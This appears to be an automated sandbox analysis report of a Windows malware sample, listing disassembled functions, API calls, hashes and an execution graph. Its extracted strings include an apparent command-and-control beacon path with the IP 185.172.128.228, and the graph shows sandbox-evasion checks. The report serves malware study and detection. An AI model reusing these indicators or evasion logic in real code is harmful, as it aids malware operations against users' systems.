                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 737400349-0
                                                                                                                                                                                                                                      • Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                                                                                                      • Instruction ID: f1d65ff4a2caa8f4402a5ee0af87b259506669f2abbd9cc63769bcbaa0b6a130
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D012D32500108BBDF116F96CC81DEF7F69EF99758F044129FE0866261D73AE861EBA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0414CF2B
                                                                                                                                                                                                                                        • Part of subcall function 0414CE78: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0414CEA7
                                                                                                                                                                                                                                        • Part of subcall function 0414CE78: ___AdjustPointer.LIBCMT ref: 0414CEC2
                                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 0414CF40
                                                                                                                                                                                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0414CF51
                                                                                                                                                                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 0414CF79
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 737400349-0
                                                                                                                                                                                                                                      • Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                                                                                                      • Instruction ID: 910dc1de0337975c72d2f9673496fa6c57163338d58bc8daa1cf1b16ea506326
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A014C72100108BBDF126E95DC80EEB7F6AEF99758F054004FE08A6120E736E962DBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0414ED94,00000000,00000000,?,04157461,0414ED94,00000000,00000000,00000000,?,04157719,00000006,0042F348), ref: 041574EC
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,04157461,0414ED94,00000000,00000000,00000000,?,04157719,00000006,0042F348,0042F340,0042F348,00000000,00000364,?,04157052), ref: 041574F8
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,04157461,0414ED94,00000000,00000000,00000000,?,04157719,00000006,0042F348,0042F340,0042F348,00000000), ref: 04157506
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                      • Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                                                                                                      • Instruction ID: 470ffa0a89ab11a30e3dac1a3b74675d34f691ed8253a7bdb1f6c8a186e57727
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2001D836761227DBC7314F68AC85E967798AF04761F510570FE3AD31E0EB20E901C6D4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 004129CD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                      • Opcode ID: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
                                                                                                                                                                                                                                      • Instruction ID: 0a9ba9cf01538bb623dd895b254acf0ed02b79a8d0ee48bda8380b1111d13792
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3651607175420196C7217718DF813FB6BA0EB40750F64497BE085C23A9EB7D8CE6DA8E
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DE21
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Info
                                                                                                                                                                                                                                      • String ID: $.A
                                                                                                                                                                                                                                      • API String ID: 1807457897-2696116503
                                                                                                                                                                                                                                      • Opcode ID: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
                                                                                                                                                                                                                                      • Instruction ID: bc213980aac5c6bda6009a83c5849e62ad2cee4ae6a6ae2e32fe98ed2f123d1c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA410AF190434C9EDB218E248D84BFABBB9DF55304F1404EEE58A97142D23DAA86CF65
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0414A96A
                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0414AA23
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                      • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                      • Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                                                                                                      • Instruction ID: 0b1314d9958baa8c570a703720edf576a589d0cb572c20137129db65a71e1206
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E412B70A80209DBDF10DF68C8C4A9E7BB5EFC5368F1680A5E8195B391D731F955CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,20001004,?,00000002), ref: 0041FE6D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                      • API String ID: 0-711371036
                                                                                                                                                                                                                                      • Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                                                                                                      • Instruction ID: db8a1e39b5ed56134af0dcb237998205fad8b660637b78a6cadd581e1e0cf4fb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20213872A04301A6DB308E15D9017E7739A9B60B24F164077E90AC7312E73ADDC7C39C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetACP.KERNEL32(?,20001004,?,00000002), ref: 041600D4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                      • API String ID: 0-711371036
                                                                                                                                                                                                                                      • Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                                                                                                      • Instruction ID: abdcb022de41547c865476b26882c0f2bfe2afcc2f2afdcd4efcc19c147ff23d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A921F862B01104E6E734CE54C981BAB7A6AEB4CBD8F1785A4ED0BD7140F737F9608354
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 041662B6
                                                                                                                                                                                                                                        • Part of subcall function 04141E19: __EH_prolog.LIBCMT ref: 04141E1E
                                                                                                                                                                                                                                        • Part of subcall function 0414266A: __EH_prolog.LIBCMT ref: 0414266F
                                                                                                                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 04166398
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                      • String ID: ,jC
                                                                                                                                                                                                                                      • API String ID: 420165198-3201430929
                                                                                                                                                                                                                                      • Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                                                                                                      • Instruction ID: ef8abb954f1ca24d537ef8a567c55142f07a0927e8248341f75b27f55c4fda2d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D31EBB5D01119EBEB14EF94D984AEDF7B4FF58304F1081AAE406A3640EB74AA58CF60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00417217
                                                                                                                                                                                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                                                      • String ID: -@
                                                                                                                                                                                                                                      • API String ID: 2279764990-2564449678
                                                                                                                                                                                                                                      • Opcode ID: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
                                                                                                                                                                                                                                      • Instruction ID: 290a678ed3add9fd0faa91afd9d0ee705692a8110a20fb2286b59343c35ba588
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B110A33A041209BAF369E19DC809DB73B5EB847247164172FD19AB354DA34DC86C6D9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: H_prolog
                                                                                                                                                                                                                                      • String ID: /ping.php?substr=%s$185.172.128.228
                                                                                                                                                                                                                                      • API String ID: 3519838083-3577573015
                                                                                                                                                                                                                                      • Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                                                                                                      • Instruction ID: 7b6dfb3f8f1c8d27c76164ee4eac5e21074d72dd8ad347809e0f3e64fbe8a7e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F01C472A01114BBDB04AF899C41BAEF769EF45315F10013FF405E3292D3789E41C6E9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                      • std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                        • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
                                                                                                                                                                                                                                        • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
                                                                                                                                                                                                                                        • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
                                                                                                                                                                                                                                        • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
                                                                                                                                                                                                                                        • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                      • String ID: T*@
                                                                                                                                                                                                                                      • API String ID: 4198646248-2370032326
                                                                                                                                                                                                                                      • Opcode ID: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
                                                                                                                                                                                                                                      • Instruction ID: f5781f1056de0421007c94b05f43b79da385089699a731dc7870890d3004fbc1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ec9199d66afed3907134f97eebd3b9b00bf7a97696591750704becf4680ddf6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B21B0B5A00A06AFC305DF6AD580995FBF4FF49314B41826FE809D7B50E774A924CFA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: H_prolog
                                                                                                                                                                                                                                      • String ID: /ping.php?substr=%s$185.172.128.228
                                                                                                                                                                                                                                      • API String ID: 3519838083-3577573015
                                                                                                                                                                                                                                      • Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                                                                                                      • Instruction ID: 3d549e17f911564bd1952ff4188620cfedf7de7688d8c951860f5185488b8cc4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0401C0B2A01119ABE704DF98DC80BAEF7B9FF84714F14012AF815E3240D370AA5086E0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 00404373
                                                                                                                                                                                                                                        • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
                                                                                                                                                                                                                                      • __Getcoll.LIBCPMT ref: 004043CF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: H_prolog$Getcoll
                                                                                                                                                                                                                                      • String ID: u@@
                                                                                                                                                                                                                                      • API String ID: 206117190-736001340
                                                                                                                                                                                                                                      • Opcode ID: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
                                                                                                                                                                                                                                      • Instruction ID: 69c11f36173d25db8645085f4dff982521935f2d07d38959ddb20a2960a7de4d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 270736e8c7e434f475df5a6f2add70e77253c20f60e327508c33da834ea4415e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B21170B19012099FCB04EFA9D581A9EB7B4FF44304F10843FE555BB281DB789A44CB99
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A76A
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041A778
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A7D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                                                                                                      • Opcode ID: be72b92f97b89cfc26330611fce1d14ea8f59d6c2fceb8f783a7245ea47926fa
                                                                                                                                                                                                                                      • Instruction ID: a04565de271e9a0d08a9f39f26722ecfcdc9a59ce40c97fd2178d4ba0242ee74
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be72b92f97b89cfc26330611fce1d14ea8f59d6c2fceb8f783a7245ea47926fa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5541E934602246AFCF219F69C9447FB7BB4EF01310F14416AEC6997291D738CDA2C75A
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0415A9D1
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0415A9DF
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0415AA3A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                                                                                                      • Opcode ID: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
                                                                                                                                                                                                                                      • Instruction ID: fdbba24a4022b4b648b5daebb0656c6ee8524c307194c825974aaa4415a18af3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1341C435640216EFDF258F64C9C4BEA7BA4AF41390F1582A9ED7DE71B0E730A901C760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:4.2%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:2.4%
                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                      Total number of Limit Nodes:41
                                                                                                                                                                                                                                      execution_graph 80770 401150 80777 414400 GetProcessHeap HeapAlloc GetComputerNameA 80770->80777 80772 40115e 80773 40118c 80772->80773 80779 4143c0 GetProcessHeap HeapAlloc GetUserNameA 80772->80779 80775 401177 80775->80773 80776 401184 ExitProcess 80775->80776 80778 414436 80777->80778 80778->80772 80779->80775 80780 4136b0 80823 402130 80780->80823 80798 4136f0 80799 414400 3 API calls 80798->80799 80800 413703 80799->80800 80957 416fb0 80800->80957 80802 413724 80803 416fb0 4 API calls 80802->80803 80804 41372b 80803->80804 80805 416fb0 4 API calls 80804->80805 80806 413732 80805->80806 80807 416fb0 4 API calls 80806->80807 80808 413739 80807->80808 80809 416fb0 4 API calls 80808->80809 80810 413740 80809->80810 80965 416ea0 80810->80965 80812 4137cc 80969 4135e0 GetSystemTime 80812->80969 80814 413749 80814->80812 80816 413782 OpenEventA 80814->80816 80818 4137b5 CloseHandle Sleep 80816->80818 80819 413799 80816->80819 80820 4137ca 80818->80820 80822 4137a1 CreateEventA 80819->80822 80820->80814 80822->80812 81115 4043b0 LocalAlloc 80823->81115 80826 4043b0 2 API calls 80827 40215d 80826->80827 80828 4043b0 2 API calls 80827->80828 80829 402176 80828->80829 80830 4043b0 2 API calls 80829->80830 80831 40218f 80830->80831 80832 4043b0 2 API calls 80831->80832 80833 4021a8 80832->80833 80834 4043b0 2 API calls 80833->80834 80835 4021c1 80834->80835 80836 4043b0 2 API calls 80835->80836 80837 4021da 80836->80837 80838 4043b0 2 API calls 80837->80838 80839 4021f3 80838->80839 80840 4043b0 2 API calls 80839->80840 80841 40220c 80840->80841 80842 4043b0 2 API calls 80841->80842 80843 402225 80842->80843 80844 4043b0 2 API calls 80843->80844 80845 40223e 80844->80845 80846 4043b0 2 API calls 80845->80846 80847 402257 80846->80847 80848 4043b0 2 API calls 80847->80848 80849 402270 80848->80849 80850 4043b0 2 API calls 80849->80850 80851 402289 80850->80851 80852 4043b0 2 API calls 80851->80852 80853 4022a2 80852->80853 80854 4043b0 2 API calls 80853->80854 80855 4022bb 80854->80855 80856 4043b0 2 API calls 80855->80856 80857 4022d4 80856->80857 80858 4043b0 2 API calls 80857->80858 80859 4022ed 80858->80859 80860 4043b0 2 API calls 80859->80860 80861 402306 80860->80861 80862 4043b0 2 API calls 80861->80862 80863 40231f 80862->80863 80864 4043b0 2 API calls 80863->80864 80865 402338 80864->80865 80866 4043b0 2 API calls 80865->80866 80867 402351 80866->80867 80868 4043b0 2 API calls 80867->80868 80869 40236a 80868->80869 80870 4043b0 2 API calls 80869->80870 80871 402383 80870->80871 80872 4043b0 2 API calls 80871->80872 80873 40239c 80872->80873 80874 4043b0 2 API calls 80873->80874 80875 4023b5 80874->80875 80876 4043b0 2 API calls 80875->80876 80877 4023ce 80876->80877 80878 4043b0 2 API calls 80877->80878 80879 4023e7 80878->80879 80880 4043b0 2 API calls 80879->80880 80881 402400 80880->80881 80882 4043b0 2 API calls 80881->80882 80883 402419 80882->80883 80884 4043b0 2 API calls 80883->80884 80885 402432 80884->80885 80886 4043b0 2 API calls 80885->80886 80887 40244b 80886->80887 80888 4043b0 2 API calls 80887->80888 80889 402464 80888->80889 80890 4043b0 2 API calls 80889->80890 80891 40247d 80890->80891 80892 4043b0 2 API calls 80891->80892 80893 402496 80892->80893 80894 4043b0 2 API calls 80893->80894 80895 4024af 80894->80895 80896 4043b0 2 API calls 80895->80896 80897 4024c8 80896->80897 80898 4043b0 2 API calls 80897->80898 80899 4024e1 80898->80899 80900 4043b0 2 API calls 80899->80900 80901 4024fa 80900->80901 80902 4043b0 2 API calls 80901->80902 80903 402513 80902->80903 80904 4043b0 2 API calls 80903->80904 80905 40252c 80904->80905 80906 4043b0 2 API calls 80905->80906 80907 402545 80906->80907 80908 4043b0 2 API 